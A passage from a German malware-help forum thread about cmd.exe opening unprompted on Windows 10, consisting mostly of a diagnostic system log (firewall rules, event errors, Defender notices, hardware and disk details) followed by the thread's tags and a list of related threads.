FirewallRules: [TCP Query User{0CB4AFB0-E654-49A0-919E-EDBD33CFC450}C:\program files\oculus\support\oculus-runtime\ovrserver_x64.exe] => (Allow) C:\program files\oculus\support\oculus-runtime\ovrserver_x64.exe (Oculus VR, LLC -> Facebook Technologies, LLC)
FirewallRules: [UDP Query User{C95397DA-FA4C-4D4C-BB9A-643B2CF80DFE}C:\program files\oculus\support\oculus-runtime\ovrserver_x64.exe] => (Allow) C:\program files\oculus\support\oculus-runtime\ovrserver_x64.exe (Oculus VR, LLC -> Facebook Technologies, LLC)
FirewallRules: [{230FDFC7-BE16-4CAC-958D-4E0A7F13A5CC}] => (Allow) C:\Program Files\Oculus\Support\oculus-dash\dash\bin\OculusDash.exe (Oculus VR, LLC -> )
FirewallRules: [{48C2C35A-9FB8-4247-917D-D3885360DE4A}] => (Allow) C:\Program Files\Oculus\Support\oculus-dash\dash\bin\OculusDash.exe (Oculus VR, LLC -> )
FirewallRules: [{363E6CBE-89EB-4958-8F41-1EF35CD53E3A}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Home2.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{1AC7C1DA-F5B1-4E41-81EB-345D57F1EEA5}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Home2.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{42369232-BAE9-401F-A079-6E3D37B213AD}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Home2\Binaries\Win64\Home2-Win64-Shipping.exe (Oculus VR, LLC -> Epic Games, Inc.)
FirewallRules: [{C6DF017E-914B-439B-A525-D5E2C640FB65}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Home2\Binaries\Win64\Home2-Win64-Shipping.exe (Oculus VR, LLC -> Epic Games, Inc.)
FirewallRules: [{93A5D948-D363-48BA-B5FE-06421E124717}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Engine\Binaries\Win64\UnrealCEFSubProcess.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{BCC69CBD-7147-406F-9006-2E3A00B8FCC9}] => (Allow) C:\Program Files\Oculus\Support\oculus-worlds\Engine\Binaries\Win64\UnrealCEFSubProcess.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{80F3744F-032B-4BD3-BF29-B0171DBCC876}] => (Block) C:\program files\oculus\support\oculus-runtime\ovrserver_x64.exe (Oculus VR, LLC -> Facebook Technologies, LLC)
FirewallRules: [{F5176338-F2DC-488B-9417-CBAA30295044}] => (Block) C:\program files\oculus\support\oculus-runtime\ovrserver_x64.exe (Oculus VR, LLC -> Facebook Technologies, LLC)
FirewallRules: [{57307F72-152B-43E2-BD45-C15E1E738856}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{53DBBBFC-65EF-4118-94B0-FA89E04FF130}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{E1B2AE8C-E8EB-4C32-9927-F0C0B3B1CD4F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{CB389853-686A-4DBC-83F4-BC44349560AB}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{6B94C5A0-5CAC-47B3-8C9A-EE496C64CA92}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Among Us\Among Us.exe () [Datei ist nicht signiert]
FirewallRules: [{26B1469D-DF9B-4DEF-BB45-DA2B311616AD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Among Us\Among Us.exe () [Datei ist nicht signiert]
FirewallRules: [{26CB77A5-EA78-4B26-BF4C-9A7E4396B79E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Democracy 4\Democracy4.exe () [Datei ist nicht signiert]
FirewallRules: [{DAC3B43E-A1AD-4C15-AE60-B61B2C9B8872}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Democracy 4\Democracy4.exe () [Datei ist nicht signiert]

==================== Wiederherstellungspunkte =========================

03-07-2022 21:01:34 Geplanter Prüfpunkt
11-07-2022 17:56:38 Geplanter Prüfpunkt
14-07-2022 17:44:21 Windows Modules Installer

==================== Fehlerhafte Geräte im Gerätemanager ============


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (07/21/2022 12:19:33 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm SearchApp.exe Version 10.0.19041.1806 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 2a58

Startzeit: 01d89ce681cee03e

Beendigungszeit: 4294967295

Anwendungspfad: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

Bericht-ID: 7b19c046-7ae7-40e0-8117-f11497b38ed5

Vollständiger Name des fehlerhaften Pakets: Microsoft.Windows.Search_1.14.6.19041_neutral_neutral_cw5n1h2txyewy

Relative Anwendungs-ID des fehlerhaften Pakets: ShellFeedsUI

Absturztyp: Navigation

Error: (07/20/2022 10:25:59 PM) (Source: OVRServiceLauncher) (EventID: 0) (User: )
Description: Event-ID 0

Error: (07/20/2022 10:21:29 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "QueryFullProcessImageNameW" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007001f, Ein an das System angeschlossenes Gerät funktioniert nicht.
.


Vorgang:
   Asynchroner Vorgang wird ausgeführt

Kontext:
   Aktueller Status: DoSnapshotSet

Error: (07/20/2022 10:21:18 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.


Vorgang:
   Generatordaten werden gesammelt

Kontext:
   Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
   Generatorname: System Writer
   Generatorinstanz-ID: {a2ee4882-06d2-405b-abbe-993525e93a71}

Error: (07/20/2022 12:19:37 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\Windows\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (07/19/2022 12:44:09 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "QueryFullProcessImageNameW" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007001f, Ein an das System angeschlossenes Gerät funktioniert nicht.
.


Vorgang:
   Asynchroner Vorgang wird ausgeführt

Kontext:
   Aktueller Status: DoSnapshotSet

Error: (07/19/2022 12:02:51 PM) (Source: OVRServiceLauncher) (EventID: 0) (User: )
Description: Event-ID 0

Error: (07/18/2022 06:55:46 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\Windows\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).


Systemfehler:
=============
Error: (07/20/2022 10:25:24 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT)
Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet.

Modulpfad: C:\Windows\system32\IntelIHVRouter08.dll

Error: (07/20/2022 10:25:24 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT)
Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet.

Modulpfad: C:\Windows\system32\IntelIHVRouter08.dll

Error: (07/20/2022 10:25:22 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT)
Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet.

Modulpfad: C:\Windows\system32\IntelIHVRouter08.dll

Error: (07/20/2022 10:21:24 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Razer Synapse Service" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 0 Millisekunden durchgeführt: Aufführung des konfigurierten Wiederherstellungsp.

Error: (07/20/2022 10:21:24 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Search" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (07/20/2022 10:21:24 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "SQL Server VSS Writer" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (07/20/2022 10:21:24 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Razer Game Manager" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (07/20/2022 10:21:24 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Razer Central Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.


Windows Defender:
================
Date: 2022-07-20 12:37:44
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {CA6E81D5-98DD-464B-8722-6CCBFBBE8DCE}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2022-07-19 00:05:17
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {D0E01182-88A3-4FBE-B873-0F77F12EEE2F}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2022-07-18 23:29:03
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {FDBAB32A-5E89-41A6-9C99-0843B6FA6A05}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2022-07-17 19:50:38
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {3AB61364-FDB3-4647-9B30-4B5FCC63F9D1}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM
Event[0]:

Date: 2022-07-14 23:24:34
Description: 
Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features.
Feature: Bei Zugriff
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden. 
Ursache: Die Antischadsoft-Sicherheitsfunktion wurde aus unbekanntem Grund beendet. Möglicherweise kann das Problem durch einen Neustart des Diensts behoben werden.

Date: 2022-07-14 23:16:15
Description: 
Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features.
Feature: Bei Zugriff
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden. 
Ursache: Die Antischadsoft-Sicherheitsfunktion wurde aus unbekanntem Grund beendet. Möglicherweise kann das Problem durch einen Neustart des Diensts behoben werden.

Date: 2021-01-05 13:12:59
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.329.158.0
Update Source: Microsoft Update-Server
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.17700.4
Fehlercode: 0x8024001e
Fehlerbeschreibung: Unerwartetes Problem bei der Überprüfung auf Updates. Informationen zum Installieren von Updates oder zur Problembehandlung finden Sie unter "Hilfe und Support". 

CodeIntegrity:
===============
Date: 2022-07-21 11:44:58
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Avira\Endpoint Protection SDK\amsi\x64\avamsi.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Speicherinformationen =========================== 

BIOS: American Megatrends Inc. 3103 06/17/2020
Hauptplatine: ASUSTeK COMPUTER INC. ROG STRIX B450-F GAMING
Prozessor: AMD Ryzen 7 3700X 8-Core Processor 
Prozentuale Nutzung des RAM: 19%
Installierter physikalischer RAM: 32694.54 MB
Verfügbarer physikalischer RAM: 26181.28 MB
Summe virtueller Speicher: 37558.54 MB
Verfügbarer virtueller Speicher: 28539 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:930.96 GB) (Free:519.93 GB) (Model: KINGSTON SA2000M81000G) NTFS
Drive d: (HDD-Festplatte) (Fixed) (Total:1863.01 GB) (Free:1858.04 GB) (Model: ST2000DM008-2FR102) NTFS

\\?\Volume{1b5d4295-0000-0000-0000-100000000000}\ (System-reserviert) (Fixed) (Total:0.05 GB) (Free:0.02 GB) NTFS
\\?\Volume{1b5d4295-0000-0000-0000-80c0e8000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 51DDC66D)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 1B5D4295)
Partition 1: (Active) - (Size=50 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=515 MB) - (Type=27)

==================== Ende von Addition.txt =======================
         

Thema geschlossen

Themen zu Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber
avira, cmd öffnet automatisch, excel, fehler, google, home, internet, internet explorer, microsoft defender, nvcontainer, nvcontainer.exe, powershell, problem, programm, proxy, prozesse, realtek, registry, rundll, scan, security, services.exe, software, stick, svchost.exe, system, troja, trojaner, udp, usb, windows



Ähnliche Themen: Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber


  1. Windows 10: Bluescreen in unregelmäßigen abständen
    Alles rund um Windows - 22.05.2021 (29)
  2. Windows 10: Bildschirm friert in unregelmäßigen Abständen ein, Tastatur und Maus kein Signal
    Netzwerk und Hardware - 02.11.2018 (18)
  3. Windows 10: Cmd-Fenster öffnet sich in unregelmäßigen Abständen von selbst
    Log-Analyse und Auswertung - 05.06.2017 (1)
  4. CMD-Fenster öffnet sich in unregelmäßigen Abständen kurz
    Plagegeister aller Art und deren Bekämpfung - 29.05.2017 (7)
  5. Firefox öffnet neue Tabs mit Werbung in unregelmäßigen Abständen.
    Log-Analyse und Auswertung - 17.03.2017 (13)
  6. Programme hängen sich in unregelmäßigen Abständen auf
    Netzwerk und Hardware - 04.10.2016 (7)
  7. Windows tapt in unregelmäßigen Abständen aus
    Plagegeister aller Art und deren Bekämpfung - 31.03.2015 (5)
  8. Windows tabt immer in unregelmäßigen Abständen aus
    Alles rund um Windows - 31.03.2015 (4)
  9. Windows 7 wirft mich auf den Desktop in unregelmäßigen Abständen (überwiegend bei Spielen aufgefallen)
    Plagegeister aller Art und deren Bekämpfung - 04.06.2014 (25)
  10. Sounds im Hintergrund in unregelmäßigen Abständen
    Plagegeister aller Art und deren Bekämpfung - 25.05.2014 (23)
  11. Windows Vista: friert in unregelmäßigen Abständen ein
    Alles rund um Windows - 24.03.2014 (1)
  12. PC stürzt in unregelmäßigen Abständen ab
    Plagegeister aller Art und deren Bekämpfung - 14.01.2014 (6)
  13. Windows 8 Pro (x64) friert in unregelmäßigen abständen ein.
    Log-Analyse und Auswertung - 29.09.2013 (17)
  14. Fragwürdiges Geräusch in unregelmäßigen Abständen
    Netzwerk und Hardware - 19.09.2013 (7)
  15. Spiele minimieren sich in unregelmäßigen Abständen und Add-On "Plus-HD-2.3" entfernen.
    Plagegeister aller Art und deren Bekämpfung - 05.08.2013 (7)
  16. Webseiten, die sich in unregelmäßigen Abständen automatisch öffnen
    Plagegeister aller Art und deren Bekämpfung - 02.06.2012 (1)
  17. PC startet in unregelmäßigen abständen neu + Active desktop
    Log-Analyse und Auswertung - 07.07.2009 (4)

Zum Thema Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber - Hallo, dies ist mein erster Beitrag hier, sollte ich grobe Fehler(im hier gewünschten style, oder technische) machen bzw, gemacht haben entschuldige ich mich hier schon einmal. Folgendes Problem: ich hatte - Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber...
Archiv
Du betrachtest: Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.